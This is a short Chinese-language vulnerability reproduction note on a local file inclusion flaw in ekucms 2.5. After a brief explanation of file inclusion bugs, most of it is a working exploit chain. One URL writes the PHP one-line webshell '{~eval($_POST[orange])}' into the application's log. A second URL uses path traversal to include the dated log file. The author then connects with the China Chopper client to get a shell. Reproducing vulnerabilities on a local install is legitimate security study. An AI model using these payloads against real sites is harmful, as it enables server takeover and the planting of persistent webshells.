文件包含漏洞是指开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。易酷 cms2.5 本地文件包含漏洞可getshell。
下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php) 安装成功后进行复现,本地包含写一句话木马。
http:
/
/
127.0
.
0.1
/
test
/
ekucms2.
5
/
?s
=
my
/
show
/
id
/
{~
eval
($_POST[orange])}
该日志是以时间日期命名的,用菜刀连接该日志文件,得到shell
http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log